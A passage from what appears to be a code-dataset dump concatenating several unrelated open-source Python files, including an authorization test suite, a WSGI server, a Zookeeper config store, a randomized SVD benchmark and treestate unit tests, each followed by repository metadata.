with self.assertRaises(Http403):
session.all_user(tenant=tenant)
## Jeeves, Harry and Jack cannot create users on any tenant
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
for tenant in self.all_tenants:
with self.assertRaises(Http403):
data = dict(
username=u'dummy',
name=u'Dummy',
surname=u'H',
tenant=tenant,
userServer=self.server1,
)
session.create_user(initial=data)
## Rob cannot create users in Wheels
with self.assertRaises(Http403):
data = dict(
username=u'dummy',
name=u'Dummy',
surname=u'H',
tenant=self.ten_wheels,
userServer=self.server1,
)
self.s_wheels_rob.create_user(initial=data)
| zarafagroupware/zarafa-zsm | tests/tests_authorization.py | Python | agpl-3.0 | 11,327 | 0.002472 |
class Solution(object):
def numIslands(self, grid):
"""
:type grid: List[List[str]]
:rtype: int
"""
count = 0
for r in range(len(grid)):
for c in range(len(grid[0])):
if grid[r][c] == "1":
self.clearIsland(grid, r, c)
count += 1
return count
def clearIsland(self, grid, r, c):
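        # Sink the current cell, then recurse into the 4-connected neighbours that are still land.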
grid[r][c] = "0"
if r > 0 and grid[r - 1][c] == "1":
self.clearIsland(grid, r - 1, c)
if r < len(grid) - 1 and grid[r + 1][c] == "1":
self.clearIsland(grid, r + 1, c)
if c > 0 and grid[r][c - 1] == "1":
self.clearIsland(grid, r, c - 1)
if c < len(grid[0]) - 1 and grid[r][c + 1] == "1":
self.clearIsland(grid, r, c + 1)
return
| Jspsun/LEETCodePractice | Python/NumberOfIslands.py | Python | mit | 834 | 0 |
import sys
from io import BytesIO
from whoops.httplib.http_server import HttpServer
from whoops import ioloop
class WSGIServer(HttpServer):
def __init__(self, ioloop, address):
super(WSGIServer, self).__init__(ioloop, address)
self.app = None
self.environ = None
self.result = None
self.cgi_environ = None
self.http_version = "HTTP/1.1"
self.wsgi_version = (1, 0)
self.wsgi_multithread = True
self.wsgi_multiprocess = False
self.wsgi_run_once = False
def set_app(self, app):
self.app = app
def on_connection(self, conn):
self.connection = conn
self.parse_request()
self.setup_environ()
self.result = self.app(self.environ, self.start_response)
self.finish_response()
def setup_cgi_environ(self):
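        # Translate the parsed request line and headers into CGI-style environment variables.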
env = {}
request_line = self.raw_requestline.decode("latin-1").rstrip("\r\n")
method, path, version = request_line.split(" ")
if "?" in path:
_path, query_string = path.split("?")
env["QUERY_STRING"] = query_string
env["REQUEST_METHOD"] = method
env["PATH_INFO"] = path
env["SERVER_PROTOCOL"] = self.http_version
env["SERVER_HOST"] = self.host
env["SERVER_PORT"] = self.port
if "content-type" in self.header:
env["CONTENT_TYPE"] = self.header.get("content-type")
if "content-length" in self.header:
env["CONTENT_LENGTH"] = self.header.get("content-length")
for key, value in self.header.items():
env["HTTP_" + key.replace("-", "_").upper()] = value
self.cgi_environ = env
def setup_environ(self):
self.setup_cgi_environ()
env = self.environ = self.cgi_environ.copy()
env["wsgi.input"] = BytesIO(self.request_body)
env["wsgi.errors"] = sys.stdout
env["wsgi.version"] = self.wsgi_version
env["wsgi.run_once"] = self.wsgi_run_once
env["wsgi.url_scheme"] = "http"
env["wsgi.multithread"] = self.wsgi_multithread
env["wsgi.wsgi_multiprocess"] = self.wsgi_multiprocess
def start_response(self, status, headers, exc_info=None):
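        # WSGI start_response callable: send the status line and headers, and note whether the application
        # already supplied a Content-Length header.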
code = int(status[0:3])
message = str(status[4:])
self.send_response(code, message)
self.ioloop.logger.info(
self.cgi_environ["PATH_INFO"] + " %s %d %s" % ("HTTP/1.1", code, message)
)
self.need_content_length = True
for name, val in headers:
if name == "Content-Length":
self.need_content_length = False
self.send_header(name, val)
self.send_header("Date", self.date_string())
if code == 304:
self.need_content_length = False
def finish_response(self):
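        # If the application did not provide Content-Length, compute it from the result iterable before
        # ending the headers and sending the body.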
if self.need_content_length:
content_length = 0
for data in self.result:
content_length += len(data)
self.send_header("Content-Length", content_length)
self.end_headers()
for data in self.result:
self.send(data)
def make_server(host, port, app):
server = WSGIServer(ioloop.IOLoop.instance(num_backends=1000), (host, port))
server.set_app(app)
return server
| jasonlvhit/whoops | whoops/wsgilib/wsgi_server.py | Python | mit | 3,279 | 0.00061 |
# (C) Datadog, Inc. 2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# std
import logging
from kazoo.client import KazooClient, NoNodeError
from utils.service_discovery.abstract_config_store import AbstractConfigStore, KeyNotFound
DEFAULT_ZK_HOST = '127.0.0.1'
DEFAULT_ZK_PORT = 2181
DEFAULT_TIMEOUT = 5
log = logging.getLogger(__name__)
class ZookeeperStore(AbstractConfigStore):
"""Implementation of a config store client for Zookeeper"""
def _extract_settings(self, config):
"""Extract settings from a config object"""
settings = {
'host': config.get('sd_backend_host', DEFAULT_ZK_HOST),
'port': int(config.get('sd_backend_port', DEFAULT_ZK_PORT)),
}
return settings
def get_client(self, reset=False):
if self.client is None or reset is True:
self.client = KazooClient(
hosts=self.settings.get('host') + ":" + str(self.settings.get('port')),
read_only=True,
)
self.client.start()
return self.client
def client_read(self, path, **kwargs):
"""Retrieve a value from a Zookeeper key."""
try:
if kwargs.get('watch', False):
return self.recursive_mtime(path)
elif kwargs.get('all', False):
# we use it in _populate_identifier_to_checks
results = []
self.recursive_list(path, results)
return results
else:
res, stats = self.client.get(path)
return res.decode("utf-8")
except NoNodeError:
raise KeyNotFound("The key %s was not found in Zookeeper" % path)
def recursive_list(self, path, results):
"""Recursively walks the children from the given path and build a list of key/value tuples"""
try:
data, stat = self.client.get(path)
if data:
node_as_string = data.decode("utf-8")
                if node_as_string:
results.append((path.decode("utf-8"), node_as_string))
children = self.client.get_children(path)
if children is not None:
for child in children:
new_path = '/'.join([path.rstrip('/'), child])
self.recursive_list(new_path, results)
except NoNodeError:
raise KeyNotFound("The key %s was not found in Zookeeper" % path)
def recursive_mtime(self, path):
"""Recursively walks the children from the given path to find the maximum modification time"""
try:
data, stat = self.client.get(path)
children = self.client.get_children(path)
if children is not None and len(children) > 0:
for child in children:
new_path = '/'.join([path.rstrip('/'), child])
return max(stat.mtime, self.recursive_mtime(new_path))
else:
return stat.mtime
except NoNodeError:
raise KeyNotFound("The key %s was not found in Zookeeper" % path)
def dump_directory(self, path, **kwargs):
"""Return a dict made of all image names and their corresponding check info"""
templates = {}
paths = []
self.recursive_list(path, paths)
for pair in paths:
splits = pair[0].split('/')
image = splits[-2]
param = splits[-1]
value = pair[1]
if image not in templates:
templates[image] = {}
templates[image][param] = value
return templates
| takus/dd-agent | utils/service_discovery/zookeeper_config_store.py | Python | bsd-3-clause | 3,661 | 0.001639 |
from django.contrib import admin
from .models import SnmpDevice, SnmpDeviceMessage, PingHistory
# Register your models here.
class SnmpDeviceAdmin(admin.ModelAdmin):
fields = [
'name', 'hostname', 'status', 'ping_mode', 'ping_port',
'snmp_template', 'snmp_port', 'snmp_community', 'snmp_system_contact',
'snmp_system_description', 'snmp_system_name', 'snmp_system_location',
'snmp_system_uptime','ping_last_seen', 'ping_last_tried',
'snmp_last_tried', 'snmp_last_poll', 'snmp_logged_on_users'
]
readonly_fields = (
'ping_last_seen', 'ping_last_tried', 'snmp_last_tried',
'snmp_last_poll'
)
list_display = [
'name', 'hostname', 'snmp_logged_on_users'
]
class SnmpDeviceMessageAdmin(admin.ModelAdmin):
fields = (
'snmp_device', 'status', 'message_choice', 'resolved', 'resolved_by'
)
class PingHistoryAdmin(admin.ModelAdmin):
fields = [
'snmp_device', 'online', 'timestamp'
]
readonly_fields = [
'timestamp',
]
list_display = [
'snmp_device', 'online', 'timestamp'
]
admin.site.register(SnmpDevice, SnmpDeviceAdmin)
admin.site.register(PingHistory, PingHistoryAdmin)
admin.site.register(SnmpDeviceMessage, SnmpDeviceMessageAdmin)
| MikaelSchultz/dofiloop-sentinel | sentinel/device/admin.py | Python | mit | 1,293 | 0.001547 |
"""
Benchmarks on the power iterations phase in randomized SVD.
We test on various synthetic and real datasets the effect of increasing
the number of power iterations in terms of quality of approximation
and running time. A number greater than 0 should help with noisy matrices,
which are characterized by a slow spectral decay.
We test several policy for normalizing the power iterations. Normalization
is crucial to avoid numerical issues.
The quality of the approximation is measured by the spectral norm discrepancy
between the original input matrix and the reconstructed one (by multiplying
the randomized_svd's outputs). The spectral norm is always equivalent to the
largest singular value of a matrix. (3) justifies this choice. However, one can
notice in these experiments that Frobenius and spectral norms behave
very similarly in a qualitative sense. Therefore, we suggest to run these
benchmarks with `enable_spectral_norm = False`, as Frobenius' is MUCH faster to
compute.
The benchmarks follow.
(a) plot: time vs norm, varying number of power iterations
data: many datasets
goal: compare normalization policies and study how the number of power
iterations affect time and norm
(b) plot: n_iter vs norm, varying rank of data and number of components for
randomized_SVD
data: low-rank matrices on which we control the rank
goal: study whether the rank of the matrix and the number of components
extracted by randomized SVD affect "the optimal" number of power iterations
(c) plot: time vs norm, varying datasets
data: many datasets
goal: compare default configurations
We compare the following algorithms:
- randomized_svd(..., power_iteration_normalizer='none')
- randomized_svd(..., power_iteration_normalizer='LU')
- randomized_svd(..., power_iteration_normalizer='QR')
- randomized_svd(..., power_iteration_normalizer='auto')
- fbpca.pca() from https://github.com/facebook/fbpca (if installed)
Conclusion
----------
- n_iter=2 appears to be a good default value
- power_iteration_normalizer='none' is OK if n_iter is small, otherwise LU
gives similar errors to QR but is cheaper. That's what 'auto' implements.
References
----------
(1) :arxiv:`"Finding structure with randomness:
Stochastic algorithms for constructing approximate matrix decompositions."
<0909.4061>`
Halko, et al., (2009)
(2) A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert
(3) An implementation of a randomized algorithm for principal component
analysis
A. Szlam et al. 2014
"""
# Author: Giorgio Patrini
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import gc
import pickle
from time import time
from collections import defaultdict
import os.path
from sklearn.utils._arpack import _init_arpack_v0
from sklearn.utils import gen_batches
from sklearn.utils.validation import check_random_state
from sklearn.utils.extmath import randomized_svd
from sklearn.datasets import make_low_rank_matrix, make_sparse_uncorrelated
from sklearn.datasets import (
fetch_lfw_people,
fetch_openml,
fetch_20newsgroups_vectorized,
fetch_olivetti_faces,
fetch_rcv1,
)
try:
import fbpca
fbpca_available = True
except ImportError:
fbpca_available = False
# If this is enabled, tests are much slower and will crash with the large data
enable_spectral_norm = False
# TODO: compute approximate spectral norms with the power method as in
# Estimating the largest eigenvalues by the power and Lanczos methods with
# a random start, Jacek Kuczynski and Henryk Wozniakowski, SIAM Journal on
# Matrix Analysis and Applications, 13 (4): 1094-1122, 1992.
# This approximation is a very fast estimate of the spectral norm, but depends
# on starting random vectors.
# Determine when to switch to batch computation for matrix norms,
# in case the reconstructed (dense) matrix is too large
MAX_MEMORY = int(2e9)
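# Minimal usage sketch of the API benchmarked below, kept as an uncalled helper:
# a single randomized_svd call with an explicit power-iteration normalizer. The
# matrix size, rank and n_iter values are illustrative choices, not benchmark settings.
def _example_single_run(seed=0):
    rng = check_random_state(seed)
    A = make_low_rank_matrix(
        n_samples=200, n_features=1000, effective_rank=20, random_state=rng
    )
    U, s, Vt = randomized_svd(
        A,
        n_components=20,
        n_oversamples=10,
        n_iter=4,
        power_iteration_normalizer="LU",
        random_state=rng,
    )
    # Frobenius discrepancy between A and its rank-20 reconstruction
    return np.linalg.norm(A - U.dot(np.diag(s).dot(Vt)), ord="fro")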
# The following datasets can be downloaded manually from:
# CIFAR 10: https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz
# SVHN: http://ufldl.stanford.edu/housenumbers/train_32x32.mat
CIFAR_FOLDER = "./cifar-10-batches-py/"
SVHN_FOLDER = "./SVHN/"
datasets = [
"low rank matrix",
"lfw_people",
"olivetti_faces",
"20newsgroups",
"mnist_784",
"CIFAR",
"a3a",
"SVHN",
"uncorrelated matrix",
]
big_sparse_datasets = ["big sparse matrix", "rcv1"]
def unpickle(file_name):
with open(file_name, "rb") as fo:
return pickle.load(fo, encoding="latin1")["data"]
def handle_missing_dataset(file_folder):
if not os.path.isdir(file_folder):
print("%s file folder not found. Test skipped." % file_folder)
return 0
def get_data(dataset_name):
print("Getting dataset: %s" % dataset_name)
if dataset_name == "lfw_people":
X = fetch_lfw_people().data
elif dataset_name == "20newsgroups":
X = fetch_20newsgroups_vectorized().data[:, :100000]
elif dataset_name == "olivetti_faces":
X = fetch_olivetti_faces().data
elif dataset_name == "rcv1":
X = fetch_rcv1().data
elif dataset_name == "CIFAR":
        if handle_missing_dataset(CIFAR_FOLDER) == 0:  # handle_missing_dataset returns 0 when the folder is absent
return
X1 = [unpickle("%sdata_batch_%d" % (CIFAR_FOLDER, i + 1)) for i in range(5)]
X = np.vstack(X1)
del X1
elif dataset_name == "SVHN":
if handle_missing_dataset(SVHN_FOLDER) == 0:
return
X1 = sp.io.loadmat("%strain_32x32.mat" % SVHN_FOLDER)["X"]
X2 = [X1[:, :, :, i].reshape(32 * 32 * 3) for i in range(X1.shape[3])]
X = np.vstack(X2)
del X1
del X2
elif dataset_name == "low rank matrix":
X = make_low_rank_matrix(
n_samples=500,
n_features=int(1e4),
effective_rank=100,
tail_strength=0.5,
random_state=random_state,
)
elif dataset_name == "uncorrelated matrix":
X, _ = make_sparse_uncorrelated(
n_samples=500, n_features=10000, random_state=random_state
)
elif dataset_name == "big sparse matrix":
sparsity = int(1e6)
size = int(1e6)
small_size = int(1e4)
data = np.random.normal(0, 1, int(sparsity / 10))
data = np.repeat(data, 10)
row = np.random.uniform(0, small_size, sparsity)
col = np.random.uniform(0, small_size, sparsity)
X = sp.sparse.csr_matrix((data, (row, col)), shape=(size, small_size))
del data
del row
del col
else:
X = fetch_openml(dataset_name).data
return X
def plot_time_vs_s(time, norm, point_labels, title):
plt.figure()
colors = ["g", "b", "y"]
for i, l in enumerate(sorted(norm.keys())):
if l != "fbpca":
plt.plot(time[l], norm[l], label=l, marker="o", c=colors.pop())
else:
plt.plot(time[l], norm[l], label=l, marker="^", c="red")
for label, x, y in zip(point_labels, list(time[l]), list(norm[l])):
plt.annotate(
label,
xy=(x, y),
xytext=(0, -20),
textcoords="offset points",
ha="right",
va="bottom",
)
plt.legend(loc="upper right")
plt.suptitle(title)
plt.ylabel("norm discrepancy")
plt.xlabel("running time [s]")
def scatter_time_vs_s(time, norm, point_labels, title):
plt.figure()
size = 100
for i, l in enumerate(sorted(norm.keys())):
if l != "fbpca":
plt.scatter(time[l], norm[l], label=l, marker="o", c="b", s=size)
for label, x, y in zip(point_labels, list(time[l]), list(norm[l])):
plt.annotate(
label,
xy=(x, y),
xytext=(0, -80),
textcoords="offset points",
ha="right",
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"),
va="bottom",
size=11,
rotation=90,
)
else:
plt.scatter(time[l], norm[l], label=l, marker="^", c="red", s=size)
for label, x, y in zip(point_labels, list(time[l]), list(norm[l])):
plt.annotate(
label,
xy=(x, y),
xytext=(0, 30),
textcoords="offset points",
ha="right",
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"),
va="bottom",
size=11,
rotation=90,
)
plt.legend(loc="best")
plt.suptitle(title)
plt.ylabel("norm discrepancy")
plt.xlabel("running time [s]")
def plot_power_iter_vs_s(power_iter, s, title):
plt.figure()
for l in sorted(s.keys()):
plt.plot(power_iter, s[l], label=l, marker="o")
plt.legend(loc="lower right", prop={"size": 10})
plt.suptitle(title)
plt.ylabel("norm discrepancy")
plt.xlabel("n_iter")
def svd_timing(
X, n_comps, n_iter, n_oversamples, power_iteration_normalizer="auto", method=None
):
"""
Measure time for decomposition
"""
print("... running SVD ...")
if method != "fbpca":
gc.collect()
t0 = time()
U, mu, V = randomized_svd(
X,
n_comps,
n_oversamples,
n_iter,
power_iteration_normalizer,
random_state=random_state,
transpose=False,
)
call_time = time() - t0
else:
gc.collect()
t0 = time()
# There is a different convention for l here
U, mu, V = fbpca.pca(
X, n_comps, raw=True, n_iter=n_iter, l=n_oversamples + n_comps
)
call_time = time() - t0
return U, mu, V, call_time
def norm_diff(A, norm=2, msg=True, random_state=None):
"""
Compute the norm diff with the original matrix, when randomized
SVD is called with *params.
norm: 2 => spectral; 'fro' => Frobenius
"""
if msg:
print("... computing %s norm ..." % norm)
if norm == 2:
# s = sp.linalg.norm(A, ord=2) # slow
v0 = _init_arpack_v0(min(A.shape), random_state)
value = sp.sparse.linalg.svds(A, k=1, return_singular_vectors=False, v0=v0)
else:
if sp.sparse.issparse(A):
value = sp.sparse.linalg.norm(A, ord=norm)
else:
value = sp.linalg.norm(A, ord=norm)
return value
def scalable_frobenius_norm_discrepancy(X, U, s, V):
# if the input is not too big, just call scipy
if X.shape[0] * X.shape[1] < MAX_MEMORY:
A = X - U.dot(np.diag(s).dot(V))
return norm_diff(A, norm="fro")
print("... computing fro norm by batches...")
batch_size = 1000
Vhat = np.diag(s).dot(V)
cum_norm = 0.0
for batch in gen_batches(X.shape[0], batch_size):
M = X[batch, :] - U[batch, :].dot(Vhat)
cum_norm += norm_diff(M, norm="fro", msg=False)
return np.sqrt(cum_norm)
def bench_a(X, dataset_name, power_iter, n_oversamples, n_comps):
all_time = defaultdict(list)
if enable_spectral_norm:
all_spectral = defaultdict(list)
X_spectral_norm = norm_diff(X, norm=2, msg=False, random_state=0)
all_frobenius = defaultdict(list)
X_fro_norm = norm_diff(X, norm="fro", msg=False)
for pi in power_iter:
for pm in ["none", "LU", "QR"]:
print("n_iter = %d on sklearn - %s" % (pi, pm))
U, s, V, time = svd_timing(
X,
n_comps,
n_iter=pi,
power_iteration_normalizer=pm,
n_oversamples=n_oversamples,
)
label = "sklearn - %s" % pm
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if fbpca_available:
print("n_iter = %d on fbca" % (pi))
U, s, V, time = svd_timing(
X,
n_comps,
n_iter=pi,
power_iteration_normalizer=pm,
n_oversamples=n_oversamples,
method="fbpca",
)
label = "fbpca"
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if enable_spectral_norm:
title = "%s: spectral norm diff vs running time" % (dataset_name)
plot_time_vs_s(all_time, all_spectral, power_iter, title)
title = "%s: Frobenius norm diff vs running time" % (dataset_name)
plot_time_vs_s(all_time, all_frobenius, power_iter, title)
def bench_b(power_list):
n_samples, n_features = 1000, 10000
data_params = {
"n_samples": n_samples,
"n_features": n_features,
"tail_strength": 0.7,
"random_state": random_state,
}
dataset_name = "low rank matrix %d x %d" % (n_samples, n_features)
ranks = [10, 50, 100]
if enable_spectral_norm:
all_spectral = defaultdict(list)
all_frobenius = defaultdict(list)
for rank in ranks:
X = make_low_rank_matrix(effective_rank=rank, **data_params)
if enable_spectral_norm:
X_spectral_norm = norm_diff(X, norm=2, msg=False, random_state=0)
X_fro_norm = norm_diff(X, norm="fro", msg=False)
for n_comp in [int(rank / 2), rank, rank * 2]:
label = "rank=%d, n_comp=%d" % (rank, n_comp)
print(label)
for pi in power_list:
U, s, V, _ = svd_timing(
X,
n_comp,
n_iter=pi,
n_oversamples=2,
power_iteration_normalizer="LU",
)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if enable_spectral_norm:
title = "%s: spectral norm diff vs n power iteration" % (dataset_name)
        plot_power_iter_vs_s(power_list, all_spectral, title)
title = "%s: Frobenius norm diff vs n power iteration" % (dataset_name)
    plot_power_iter_vs_s(power_list, all_frobenius, title)
def bench_c(datasets, n_comps):
all_time = defaultdict(list)
if enable_spectral_norm:
all_spectral = defaultdict(list)
all_frobenius = defaultdict(list)
for dataset_name in datasets:
X = get_data(dataset_name)
if X is None:
continue
if enable_spectral_norm:
X_spectral_norm = norm_diff(X, norm=2, msg=False, random_state=0)
X_fro_norm = norm_diff(X, norm="fro", msg=False)
n_comps = np.minimum(n_comps, np.min(X.shape))
label = "sklearn"
print("%s %d x %d - %s" % (dataset_name, X.shape[0], X.shape[1], label))
U, s, V, time = svd_timing(X, n_comps, n_iter=2, n_oversamples=10, method=label)
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if fbpca_available:
label = "fbpca"
print("%s %d x %d - %s" % (dataset_name, X.shape[0], X.shape[1], label))
U, s, V, time = svd_timing(
X, n_comps, n_iter=2, n_oversamples=2, method=label
)
all_time[label].append(time)
if enable_spectral_norm:
A = U.dot(np.diag(s).dot(V))
all_spectral[label].append(
norm_diff(X - A, norm=2, random_state=0) / X_spectral_norm
)
f = scalable_frobenius_norm_discrepancy(X, U, s, V)
all_frobenius[label].append(f / X_fro_norm)
if len(all_time) == 0:
raise ValueError("No tests ran. Aborting.")
if enable_spectral_norm:
title = "normalized spectral norm diff vs running time"
scatter_time_vs_s(all_time, all_spectral, datasets, title)
title = "normalized Frobenius norm diff vs running time"
scatter_time_vs_s(all_time, all_frobenius, datasets, title)
if __name__ == "__main__":
random_state = check_random_state(1234)
power_iter = np.linspace(0, 6, 7, dtype=int)
n_comps = 50
for dataset_name in datasets:
X = get_data(dataset_name)
if X is None:
continue
print(
" >>>>>> Benching sklearn and fbpca on %s %d x %d"
% (dataset_name, X.shape[0], X.shape[1])
)
bench_a(
X,
dataset_name,
power_iter,
n_oversamples=2,
n_comps=np.minimum(n_comps, np.min(X.shape)),
)
print(" >>>>>> Benching on simulated low rank matrix with variable rank")
bench_b(power_iter)
print(" >>>>>> Benching sklearn and fbpca default configurations")
bench_c(datasets + big_sparse_datasets, n_comps)
plt.show()
| manhhomienbienthuy/scikit-learn | benchmarks/bench_plot_randomized_svd.py | Python | bsd-3-clause | 17,938 | 0.000557 |
import pytest
CODEVERSION = '0.0.1'
NEW_CODEVERSION = '0.0.2'
@pytest.fixture()
def campaign():
from psiturk.models import Campaign
parameters = {
'codeversion': CODEVERSION,
'mode': 'sandbox',
'goal': 100,
'minutes_between_rounds': 1,
'assignments_per_round': 10,
'hit_reward': 1.00,
'hit_duration_hours': 1,
}
new_campaign = Campaign(**parameters)
from psiturk.db import db_session
db_session.add(new_campaign)
db_session.commit()
return new_campaign
def test_campaign_round_codeversion_change_cancel(patch_aws_services, campaign, mocker, caplog):
from psiturk.tasks import do_campaign_round
campaign_args = {
'campaign': campaign,
'job_id': campaign.campaign_job_id
}
from psiturk.experiment import app
mocker.patch.object(app.apscheduler,
'remove_job', lambda *args, **kwargs: True)
from psiturk.amt_services_wrapper import MTurkServicesWrapper
aws_services_wrapper = MTurkServicesWrapper()
aws_services_wrapper.config['Task Parameters']['experiment_code_version'] = NEW_CODEVERSION
import psiturk.tasks
mocker.patch.object(psiturk.tasks.TaskUtils, 'aws_services_wrapper', aws_services_wrapper)
import psiturk.experiment
remove_job_mock = mocker.patch.object(psiturk.experiment.app.apscheduler, 'remove_job')
do_campaign_round(**campaign_args)
remove_job_mock.assert_called()
def test_campaign_goal_met_cancel(patch_aws_services, campaign, mocker, caplog, stubber):
from psiturk.tasks import do_campaign_round
campaign_args = {
'campaign': campaign,
'job_id': campaign.campaign_job_id
}
from psiturk.experiment import app
mocker.patch.object(app.apscheduler,
'remove_job', lambda *args, **kwargs: True)
    import psiturk.tasks
    import psiturk.models
mocker.patch.object(psiturk.models.Participant, 'count_completed', lambda *args, **kwargs: campaign.goal)
import psiturk.experiment
remove_job_mock = mocker.patch.object(psiturk.experiment.app.apscheduler, 'remove_job')
do_campaign_round(**campaign_args)
remove_job_mock.assert_called()
assert not campaign.is_active
def test_campaign_posts_hits(patch_aws_services, stubber, campaign, mocker, caplog):
from psiturk.amt_services_wrapper import MTurkServicesWrapper
aws_services_wrapper = MTurkServicesWrapper()
import psiturk.tasks
mocker.patch.object(psiturk.tasks.TaskUtils, 'aws_services_wrapper', aws_services_wrapper)
mocked_create_hit = mocker.patch.object(aws_services_wrapper, 'create_hit')
campaign_args = {
'campaign': campaign,
'job_id': campaign.campaign_job_id
}
from psiturk.tasks import do_campaign_round
do_campaign_round(**campaign_args)
assert mocked_create_hit.call_count == 2
mocked_create_hit.assert_any_call(num_workers=9, reward=campaign.hit_reward, duration=campaign.hit_duration_hours)
mocked_create_hit.assert_any_call(num_workers=1, reward=campaign.hit_reward, duration=campaign.hit_duration_hours)
def test_task_approve_all(patch_aws_services, stubber, mocker, caplog):
from psiturk.amt_services_wrapper import MTurkServicesWrapper
aws_services_wrapper = MTurkServicesWrapper()
import psiturk.tasks
mocker.patch.object(psiturk.tasks.TaskUtils, 'aws_services_wrapper', aws_services_wrapper)
mocked_approve_all = mocker.patch.object(aws_services_wrapper, 'approve_all_assignments')
from psiturk.tasks import do_approve_all
do_approve_all('sandbox')
mocked_approve_all.assert_called_once()
| NYUCCL/psiTurk | tests/test_tasks.py | Python | mit | 3,640 | 0.003571 |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
from __future__ import absolute_import
import itertools
import os
import posixpath
import random
import tempfile
import unittest
import silenttestrunner
from bindings import treestate
from edenscm.mercurial import pycompat
from hghave import require
testtmp = os.getenv("TESTTMP") or tempfile.mkdtemp("test-treestate")
def randname():
length = random.randint(1, 4)
return "".join(random.sample("abcdef", 1)[0] for i in range(length))
def randpath(path=""):
# pop components from path
for i in range(1 + random.randrange(path.count("/") + 1)):
path = os.path.dirname(path)
# push new components to path
maxlevel = 4
for i in range(1 + random.randrange(max([1, maxlevel - path.count("/")]))):
path = posixpath.join(path, randname())
if not path:
path = randname()
return path
def genpaths():
"""generate random paths"""
path = ""
while True:
nextpath = randpath(path)
yield nextpath
path = nextpath
def genfiles():
"""generate random tuple of (path, bits, mode, size, mtime, copied)"""
pathgen = genpaths()
while True:
path = next(pathgen)
bits = 0
mode = random.randint(0, 0o777)
size = random.randint(0, 1 << 31)
mtime = random.randint(-1, 1 << 31)
copied = None
# bits (StateFlags)
for bit in [
treestate.EXIST_P1,
treestate.EXIST_P2,
treestate.EXIST_NEXT,
treestate.IGNORED,
treestate.NEED_CHECK,
]:
if random.randint(0, 1):
bits |= bit
if random.randint(0, 1):
bits |= treestate.COPIED
copied = next(pathgen)
yield (path, bits, mode, size, mtime, copied)
class testtreestate(unittest.TestCase):
def testempty(self):
tree = treestate.treestate(os.path.join(testtmp, "empty"), 0)
self.assertEqual(len(tree), 0)
self.assertEqual(tree.getmetadata(), b"")
self.assertEqual(tree.walk(0, 0), [])
self.assertTrue(tree.hasdir("/"))
for path in ["", "a", "/", "b/c", "d/"]:
self.assertFalse(path in tree)
if path and path != "/":
self.assertFalse(tree.hasdir(path))
if path != "/":
if path.endswith("/"):
self.assertIsNone(tree.getdir(path))
else:
self.assertIsNone(tree.get(path, None))
def testinsert(self):
tree = treestate.treestate(os.path.join(testtmp, "insert"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testremove(self):
tree = treestate.treestate(os.path.join(testtmp, "remove"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
if (mtime & 1) == 0:
tree.remove(path)
if path in expected:
del expected[path]
else:
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testwalk(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
def walk(setbits, unsetbits):
return sorted(
k
for k, v in pycompat.iteritems(expected)
if ((v[0] & unsetbits) == 0 and (v[0] & setbits) == setbits)
)
def check(setbits, unsetbits):
self.assertEqual(
walk(setbits, unsetbits), sorted(tree.walk(setbits, unsetbits))
)
for i in ["in-memory", "flushed"]:
for bit in [treestate.IGNORED, treestate.COPIED]:
check(0, bit)
check(bit, 0)
check(treestate.EXIST_P1, treestate.EXIST_P2)
rootid = tree.flush()
tree = treestate.treestate(treepath, rootid)
def testdirfilter(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
files = ["a/b", "a/b/c", "b/c", "c/d"]
for path in files:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.walk(1, 0, None), files)
self.assertEqual(
tree.walk(1, 0, lambda dir: dir in {"a/b/", "c/"}), ["a/b", "b/c"]
)
self.assertEqual(tree.walk(1, 0, lambda dir: True), [])
def testflush(self):
treepath = os.path.join(testtmp, "flush")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
rootid1 = tree.flush()
tree.remove("a")
tree.insert("b", 1, 2, 3, 4, None)
tree.setmetadata(b"2")
rootid2 = tree.flush()
tree = treestate.treestate(treepath, rootid1)
